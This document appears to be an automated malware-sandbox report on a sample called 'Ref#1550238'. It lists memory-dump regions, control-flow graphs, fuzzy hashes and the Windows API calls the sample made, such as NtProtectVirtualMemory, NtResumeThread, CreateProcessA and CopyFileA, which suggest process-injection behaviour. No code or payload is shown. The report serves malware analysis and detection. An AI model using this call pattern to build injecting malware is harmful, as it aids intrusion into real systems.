                                                                                    • Opcode ID: f07fc1396f804e18ee6e3f1dfded850452b34c4b05b710bf98fb254bcec450be
                                                                                    • Instruction ID: 9aa110743a6ac41a17b8d037a0b6073b86e71231c8566218e72cd871f5800592
                                                                                    • Opcode Fuzzy Hash: f07fc1396f804e18ee6e3f1dfded850452b34c4b05b710bf98fb254bcec450be
                                                                                    • Instruction Fuzzy Hash: E552D575E002298FDB65DF69C850AD9B7B1FF89310F5082EAD909A7355DB30AE81CF90
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 4
                                                                                    • API String ID: 0-4088798008
                                                                                    • Opcode ID: 6b1bfb2e68e427820e0379c6b87fef11e021bef88eb71ffd4ebc629a0b48ce9c
                                                                                    • Instruction ID: 21ce98020f2c724a62cc260d73b047ccf146a64c723f9dbf44cc3327d1384d1a
                                                                                    • Opcode Fuzzy Hash: 6b1bfb2e68e427820e0379c6b87fef11e021bef88eb71ffd4ebc629a0b48ce9c
                                                                                    • Instruction Fuzzy Hash: E322F974E40229CFDB64EF68C984BADB7B2BF88301F158099D509AB2A5DB70DD81CF50

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 996 63b02ca-63b0366 NtProtectVirtualMemory 1000 63b0368-63b036e 996->1000 1001 63b036f-63b0394 996->1001 1000->1001
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063B0359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: cbf657ad225f6e75c0cacb084a4b361d01f9d6167d274f9ba35e1bdeff33762d
                                                                                    • Instruction ID: a3cccc4abd7f74cc7a9c4b9f81f58d707a99f3df5693e9d86fad74df77bc706b
                                                                                    • Opcode Fuzzy Hash: cbf657ad225f6e75c0cacb084a4b361d01f9d6167d274f9ba35e1bdeff33762d
                                                                                    • Instruction Fuzzy Hash: C32103B5D013499FDB10DFAAD884AEEFBF5FF88310F60842AE559A3250C7759901CBA0

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1011 63b02d0-63b0366 NtProtectVirtualMemory 1014 63b0368-63b036e 1011->1014 1015 63b036f-63b0394 1011->1015 1014->1015
                                                                                    APIs
                                                                                    • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 063B0359
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: MemoryProtectVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 2706961497-0
                                                                                    • Opcode ID: a51f2f1105b922ff3bce1c019cdcf59e944c5261737db3dc2b92d7fe2693a1fa
                                                                                    • Instruction ID: 0d8bee7122c2677910ba2b82110c744f52316165ede8a5a2345997087fda0363
                                                                                    • Opcode Fuzzy Hash: a51f2f1105b922ff3bce1c019cdcf59e944c5261737db3dc2b92d7fe2693a1fa
                                                                                    • Instruction Fuzzy Hash: 9E21E2B5D013499FDB10DFAAD884ADEFBF5FF48710F60842AE519A7250C779A904CBA0
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 063B288E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: 71a7444f801374e012d8c338c02b640b4aa348c7283b26797d96eab7a18330c2
                                                                                    • Instruction ID: ab76d8d89224c063f0847a35c510364a0782e4029d1ef34dac9d872114de65ca
                                                                                    • Opcode Fuzzy Hash: 71a7444f801374e012d8c338c02b640b4aa348c7283b26797d96eab7a18330c2
                                                                                    • Instruction Fuzzy Hash: 12211571D003499FDB10DFAAC8847EFFBF8AF89610F508429D559A7240CB759945CFA1
                                                                                    APIs
                                                                                    • NtResumeThread.NTDLL(?,?), ref: 063B288E
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: ResumeThread
                                                                                    • String ID:
                                                                                    • API String ID: 947044025-0
                                                                                    • Opcode ID: f368f37cac1ff21f219664b138c248c6c2741805a2ec80c056d9904b16ff3b97
                                                                                    • Instruction ID: f90c278cd8a1fb00d000f3fbe67dd8d93a2c413300c00eb8bc937cbace7f6eb5
                                                                                    • Opcode Fuzzy Hash: f368f37cac1ff21f219664b138c248c6c2741805a2ec80c056d9904b16ff3b97
                                                                                    • Instruction Fuzzy Hash: BF1117B1D003098FDB10DFAAC4847AFFBF4EF88610F50842AD519A7240CB799904CFA0
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: h
                                                                                    • API String ID: 0-2439710439
                                                                                    • Opcode ID: d44e596255ed6d4bb7bac8f7fe07cdc6e9d307c330a206a5111968321192c197
                                                                                    • Instruction ID: da8b9404a06ffd26df6f3a694e7c15e1ef7202e9c97684cd0d17344a05cf812e
                                                                                    • Opcode Fuzzy Hash: d44e596255ed6d4bb7bac8f7fe07cdc6e9d307c330a206a5111968321192c197
                                                                                    • Instruction Fuzzy Hash: F9711875E04219CFEB55DF69D840BD9B7B2FF89304F4082AAE409A7254DB30AE85CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526216892.0000000005E70000.00000040.00000800.00020000.00000000.sdmp, Offset: 05E70000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_5e70000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d0f40e767744775de85461397062418ac4f70eb7a956d196f86eb67e076cfcb0
                                                                                    • Instruction ID: 53d7e772f51aa8e106141f2679264626b766b40ba8c63de4e20ad2b8d83c7e27
                                                                                    • Opcode Fuzzy Hash: d0f40e767744775de85461397062418ac4f70eb7a956d196f86eb67e076cfcb0
                                                                                    • Instruction Fuzzy Hash: 9AA2B475A00228CFDB65CF69C984A9DBBB2FF89304F1581E9D549AB325DB319E81CF40
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528730026.0000000006B80000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B80000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6b80000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 1fdfd519f798a8f2433aa4562ae14ac7d0688cec8cf52fc84c0ac450b0acf032
                                                                                    • Instruction ID: 462f66ae699552bd6bc5cbf7526d409a58d321db381ceed01b6348ec1bb0a694
                                                                                    • Opcode Fuzzy Hash: 1fdfd519f798a8f2433aa4562ae14ac7d0688cec8cf52fc84c0ac450b0acf032
                                                                                    • Instruction Fuzzy Hash: 5E328CB1B006168FDB98DFA9C49466EFBF2FF88301F248569D55AD7385CB34A901CB90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: e8d650db4b5af1d271838d99c598f4685ca4c94bc2307feacdaaba3a7c877255
                                                                                    • Instruction ID: a233cf4dfd92b6337b4f6ce60e2071652c3c0a23c79f35db435c0279eaa56330
                                                                                    • Opcode Fuzzy Hash: e8d650db4b5af1d271838d99c598f4685ca4c94bc2307feacdaaba3a7c877255
                                                                                    • Instruction Fuzzy Hash: 08121770E45229CFEB64EF6AC844B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c3c8e8394c45dcddd6c5a6ec68c0123a7723e2d4bda0dd6afefe70f0bf785845
                                                                                    • Instruction ID: 1468097b8549f75fcdb30b14a2991f5473df8453cf653cea7a5d401684cd89fb
                                                                                    • Opcode Fuzzy Hash: c3c8e8394c45dcddd6c5a6ec68c0123a7723e2d4bda0dd6afefe70f0bf785845
                                                                                    • Instruction Fuzzy Hash: 04120670E45229CFEB64EF6AD844B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 190a9ca6220a282063ea18d4f89b555c825c80572a961a8ecb6ec194a9aceefa
                                                                                    • Instruction ID: cf61fb8f8130f4d7f65756dad6027e40a149829af53bd5e3b6c84637d22c69bf
                                                                                    • Opcode Fuzzy Hash: 190a9ca6220a282063ea18d4f89b555c825c80572a961a8ecb6ec194a9aceefa
                                                                                    • Instruction Fuzzy Hash: 9C120670E45229CFEB64EF69D884B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528151913.0000000006A20000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A20000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a20000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: d6c275f73d781446a205dd3032ef49430f73f47e1f6470b298fc40f7cb926df1
                                                                                    • Instruction ID: 49f4fcdae63e7d71fc83687336d7b2153759a38ebe060784f99e748d9ff28167
                                                                                    • Opcode Fuzzy Hash: d6c275f73d781446a205dd3032ef49430f73f47e1f6470b298fc40f7cb926df1
                                                                                    • Instruction Fuzzy Hash: 6E02E570E45229CFEB64EF69D884B9AB7B2FF89304F1081A6D409AB355DB709D81CF50
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 10e656c0ea26a4eb49cc25f07778c991c0ca7466a486bdfdce2a729eb4632514
                                                                                    • Instruction ID: 09760343b674b6914cad4732acd9a660d4d6c0d6a5b8ed6168ceaa8967bb6a51
                                                                                    • Opcode Fuzzy Hash: 10e656c0ea26a4eb49cc25f07778c991c0ca7466a486bdfdce2a729eb4632514
                                                                                    • Instruction Fuzzy Hash: 99E13A70E04208CFEB54DFA9D845BADBBB2FF89314F108199E919AB295DB305D46CF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ccdcd47af74f7f5df21299a0fa4b3f0018692263e1586bbc9cf1cbb1c4a0efa
                                                                                    • Instruction ID: 04234968f52d56023b94f62e8b73698b1c4acf4789ee4721ff98e81af9b5fce6
                                                                                    • Opcode Fuzzy Hash: 3ccdcd47af74f7f5df21299a0fa4b3f0018692263e1586bbc9cf1cbb1c4a0efa
                                                                                    • Instruction Fuzzy Hash: CED17D70E09218CFEB40DFA9D484BEEBBB5FF89304F1090AAD559AB655CB305945CF81
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 171d918dc0ef0c1d445576371d0d4145f9e8bdff60b5ad960bc2e5dc4ca8f811
                                                                                    • Instruction ID: 5755370843549ea19a5701bd602f2786f590b9065c95081674ae6485f062d25e
                                                                                    • Opcode Fuzzy Hash: 171d918dc0ef0c1d445576371d0d4145f9e8bdff60b5ad960bc2e5dc4ca8f811
                                                                                    • Instruction Fuzzy Hash: 15C1F474E15208CFEB54CFAAD484B9EBBF6BF89324F109069E409AB255DB306C45CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 51eaffea36576bd3844b3ca9604ad5fb3a104d1c6ff9fd3c89ff5b6ff8b73d08
                                                                                    • Instruction ID: a4c73d148622f46bd378f7e47953ffb73f8edd9bc2c76af5f1adf4e2793a534b
                                                                                    • Opcode Fuzzy Hash: 51eaffea36576bd3844b3ca9604ad5fb3a104d1c6ff9fd3c89ff5b6ff8b73d08
                                                                                    • Instruction Fuzzy Hash: 39C10474E15208CFEB54CFAAD484B9EBBF6BF89324F109069E409AB255DB306C45CF90
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: bb83e7fdc0597ec4b8a88279934896d11fb7cdc35e4b18263264a5d26d7beb1d
                                                                                    • Instruction ID: 9139ef2ce3240197e499a77cf7a07061181341c18cc7bb81db4f43fb3a671333
                                                                                    • Opcode Fuzzy Hash: bb83e7fdc0597ec4b8a88279934896d11fb7cdc35e4b18263264a5d26d7beb1d
                                                                                    • Instruction Fuzzy Hash: 03B11B70E05228CFDB54DFA9D844B9DBBF2BF89300F1091A9F00AAB255DB745985CF41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 487ac52719941708114606ab31c6d9aa4b025425bcd3b14fde0c8875260de438
                                                                                    • Instruction ID: 3f21930e919bb5ac3d006b7ca27cf3c2101208a9eb457caa806d5fbd99bcb7c6
                                                                                    • Opcode Fuzzy Hash: 487ac52719941708114606ab31c6d9aa4b025425bcd3b14fde0c8875260de438
                                                                                    • Instruction Fuzzy Hash: 3DB10A70E05228CFDB54DFA9D844B9DBBF2BF89300F1091A9E10AAB355DB749985CF41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f316ead0ed9457181b36cbcfb15dd8c5a08d837ee239a86fc67d56c3eb39e07c
                                                                                    • Instruction ID: 88ed28d8632862532fafc400f33116ce854c4076f4449c38fa345f7505027d8c
                                                                                    • Opcode Fuzzy Hash: f316ead0ed9457181b36cbcfb15dd8c5a08d837ee239a86fc67d56c3eb39e07c
                                                                                    • Instruction Fuzzy Hash: 35A10670E05228CFDB54DFA9D884B9DBBF2BF49300F1091AAE00AAB355D7749981CF41
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: a8567a40023f047391c183b7c78e70facea06fc76de963dfb434d58f32caf8e2
                                                                                    • Instruction ID: c5d9e9c5e60ff5a7cea1c571243880f0a08d1d2b15d4095514413d041c1f0208
                                                                                    • Opcode Fuzzy Hash: a8567a40023f047391c183b7c78e70facea06fc76de963dfb434d58f32caf8e2
                                                                                    • Instruction Fuzzy Hash: 22816770E05248DFDB45DFA9D880AAEBBF6FF89300F14806AE545AB351DB34AD45CB90

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 43 6a31a7f-6a31a9e call 6eba2d8 45 6a31aa3-6a31ada call 6a31100 43->45 48 6a31ae0-6a31ae8 45->48 49 6a312a7-6a312af 45->49 48->49 50 6a312b1-6a3150e call 6a31100 49->50 51 6a312b8-6a32091 49->51 50->49 57 6a31514-6a3151c 50->57 51->49 57->49
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2528235753.0000000006A30000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A30000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_6a30000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: 1$t
                                                                                    • API String ID: 0-2087191094
                                                                                    • Opcode ID: b827a8043a41298f46f94529d3bced313a5b61e62211f3425ecf283320644e00
                                                                                    • Instruction ID: e5d0549ab9118ac53cc1b5e8a43ccecdcdd7f86dea75562f6c2244fea3020ef7
                                                                                    • Opcode Fuzzy Hash: b827a8043a41298f46f94529d3bced313a5b61e62211f3425ecf283320644e00
                                                                                    • Instruction Fuzzy Hash: 00F0CF70D042A9CFCBA0EF68D988B9CBBF5BF05340F0046EAA408A7241DB704E818F05

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 802 63b0d24-63b0da0 804 63b0dd9-63b0df9 802->804 805 63b0da2-63b0dac 802->805 810 63b0dfb-63b0e05 804->810 811 63b0e32-63b0e6c 804->811 805->804 806 63b0dae-63b0db0 805->806 808 63b0dd3-63b0dd6 806->808 809 63b0db2-63b0dbc 806->809 808->804 812 63b0dbe 809->812 813 63b0dc0-63b0dcf 809->813 810->811 815 63b0e07-63b0e09 810->815 819 63b0e6e-63b0e78 811->819 820 63b0ea5-63b0f1a CreateProcessA 811->820 812->813 813->813 814 63b0dd1 813->814 814->808 816 63b0e0b-63b0e15 815->816 817 63b0e2c-63b0e2f 815->817 821 63b0e19-63b0e28 816->821 822 63b0e17 816->822 817->811 819->820 823 63b0e7a-63b0e7c 819->823 832 63b0f1c-63b0f22 820->832 833 63b0f23-63b0f6b 820->833 821->821 824 63b0e2a 821->824 822->821 825 63b0e9f-63b0ea2 823->825 826 63b0e7e-63b0e88 823->826 824->817 825->820 828 63b0e8a 826->828 829 63b0e8c-63b0e9b 826->829 828->829 829->829 830 63b0e9d 829->830 830->825 832->833 838 63b0f7b-63b0f7f 833->838 839 63b0f6d-63b0f71 833->839 841 63b0f8f-63b0f93 838->841 842 63b0f81-63b0f85 838->842 839->838 840 63b0f73 839->840 840->838 844 63b0fa3 841->844 845 63b0f95-63b0f99 841->845 842->841 843 63b0f87 842->843 843->841 847 63b0fa4 844->847 845->844 846 63b0f9b 845->846 846->844 847->847
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063B0F0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: ec870f84a12f1337d6acfb5a850d3d9f99fe096521bae1c04585d312cf33c147
                                                                                    • Instruction ID: 5418468626b96d65316c9bda14a745e9878a1ac0d11a9ee4eb5d4464a1594feb
                                                                                    • Opcode Fuzzy Hash: ec870f84a12f1337d6acfb5a850d3d9f99fe096521bae1c04585d312cf33c147
                                                                                    • Instruction Fuzzy Hash: F4816471E006499FDB54CFA9C8817EEBBF2BF48310F149629E858E7684DB748885CF81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 848 63b0d30-63b0da0 850 63b0dd9-63b0df9 848->850 851 63b0da2-63b0dac 848->851 856 63b0dfb-63b0e05 850->856 857 63b0e32-63b0e6c 850->857 851->850 852 63b0dae-63b0db0 851->852 854 63b0dd3-63b0dd6 852->854 855 63b0db2-63b0dbc 852->855 854->850 858 63b0dbe 855->858 859 63b0dc0-63b0dcf 855->859 856->857 861 63b0e07-63b0e09 856->861 865 63b0e6e-63b0e78 857->865 866 63b0ea5-63b0f1a CreateProcessA 857->866 858->859 859->859 860 63b0dd1 859->860 860->854 862 63b0e0b-63b0e15 861->862 863 63b0e2c-63b0e2f 861->863 867 63b0e19-63b0e28 862->867 868 63b0e17 862->868 863->857 865->866 869 63b0e7a-63b0e7c 865->869 878 63b0f1c-63b0f22 866->878 879 63b0f23-63b0f6b 866->879 867->867 870 63b0e2a 867->870 868->867 871 63b0e9f-63b0ea2 869->871 872 63b0e7e-63b0e88 869->872 870->863 871->866 874 63b0e8a 872->874 875 63b0e8c-63b0e9b 872->875 874->875 875->875 876 63b0e9d 875->876 876->871 878->879 884 63b0f7b-63b0f7f 879->884 885 63b0f6d-63b0f71 879->885 887 63b0f8f-63b0f93 884->887 888 63b0f81-63b0f85 884->888 885->884 886 63b0f73 885->886 886->884 890 63b0fa3 887->890 891 63b0f95-63b0f99 887->891 888->887 889 63b0f87 888->889 889->887 893 63b0fa4 890->893 891->890 892 63b0f9b 891->892 892->890 893->893
                                                                                    APIs
                                                                                    • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 063B0F0A
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2526983156.00000000063B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063B0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63b0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateProcess
                                                                                    • String ID:
                                                                                    • API String ID: 963392458-0
                                                                                    • Opcode ID: 630aef410956693e499b0fbda840353e25ab4be8bb9792bbe635bff72d507d2b
                                                                                    • Instruction ID: 1a2c1bdd0ae5c18d2b30bd707b727420110c6e621a53b71dfb2e788beb779a67
                                                                                    • Opcode Fuzzy Hash: 630aef410956693e499b0fbda840353e25ab4be8bb9792bbe635bff72d507d2b
                                                                                    • Instruction Fuzzy Hash: FF813271E006599FDB54CFA9C8817EEBBF2BF48310F149629E858A7680DB749885CB81

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 894 63c6dbe-63c6e29 896 63c6e2b-63c6e35 894->896 897 63c6e62-63c6e82 894->897 896->897 898 63c6e37-63c6e39 896->898 904 63c6ebb-63c6f1d CopyFileA 897->904 905 63c6e84-63c6e8e 897->905 899 63c6e5c-63c6e5f 898->899 900 63c6e3b-63c6e45 898->900 899->897 902 63c6e49-63c6e58 900->902 903 63c6e47 900->903 902->902 906 63c6e5a 902->906 903->902 915 63c6f1f-63c6f25 904->915 916 63c6f26-63c6f6e 904->916 905->904 907 63c6e90-63c6e92 905->907 906->899 909 63c6e94-63c6e9e 907->909 910 63c6eb5-63c6eb8 907->910 911 63c6ea0 909->911 912 63c6ea2-63c6eb1 909->912 910->904 911->912 912->912 913 63c6eb3 912->913 913->910 915->916 921 63c6f7e-63c6f82 916->921 922 63c6f70-63c6f74 916->922 924 63c6f84-63c6f88 921->924 925 63c6f92 921->925 922->921 923 63c6f76 922->923 923->921 924->925 926 63c6f8a 924->926 927 63c6f93 925->927 926->925 927->927
                                                                                    APIs
                                                                                    • CopyFileA.KERNEL32(?,?,?), ref: 063C6F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyFile
                                                                                    • String ID:
                                                                                    • API String ID: 1304948518-0
                                                                                    • Opcode ID: 2faf0ab4c3dfacfa85f76bf98b7504e1fbe302aef2f9330c2f5250c6ff8aea69
                                                                                    • Instruction ID: 4bdd6dc8e1d3b85664b9f8491a30d916d856549e95f93ff2ebb49fdf60b915b9
                                                                                    • Opcode Fuzzy Hash: 2faf0ab4c3dfacfa85f76bf98b7504e1fbe302aef2f9330c2f5250c6ff8aea69
                                                                                    • Instruction Fuzzy Hash: F2518971D106598FDB50DFA9C9827EEBBF2BF49720F14852EE845E7280DB748845CB80

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 928 63c6dc8-63c6e29 930 63c6e2b-63c6e35 928->930 931 63c6e62-63c6e82 928->931 930->931 932 63c6e37-63c6e39 930->932 938 63c6ebb-63c6f1d CopyFileA 931->938 939 63c6e84-63c6e8e 931->939 933 63c6e5c-63c6e5f 932->933 934 63c6e3b-63c6e45 932->934 933->931 936 63c6e49-63c6e58 934->936 937 63c6e47 934->937 936->936 940 63c6e5a 936->940 937->936 949 63c6f1f-63c6f25 938->949 950 63c6f26-63c6f6e 938->950 939->938 941 63c6e90-63c6e92 939->941 940->933 943 63c6e94-63c6e9e 941->943 944 63c6eb5-63c6eb8 941->944 945 63c6ea0 943->945 946 63c6ea2-63c6eb1 943->946 944->938 945->946 946->946 947 63c6eb3 946->947 947->944 949->950 955 63c6f7e-63c6f82 950->955 956 63c6f70-63c6f74 950->956 958 63c6f84-63c6f88 955->958 959 63c6f92 955->959 956->955 957 63c6f76 956->957 957->955 958->959 960 63c6f8a 958->960 961 63c6f93 959->961 960->959 961->961
                                                                                    APIs
                                                                                    • CopyFileA.KERNEL32(?,?,?), ref: 063C6F0D
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2527009473.00000000063C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 063C0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_63c0000_Ref#1550238.jbxd
                                                                                    Similarity
                                                                                    • API ID: CopyFile
                                                                                    • String ID:
                                                                                    • API String ID: 1304948518-0
                                                                                    • Opcode ID: dcadb45b480f6e02be710a1f70567288006a3eb598660266d235e23a6b5ef7cb
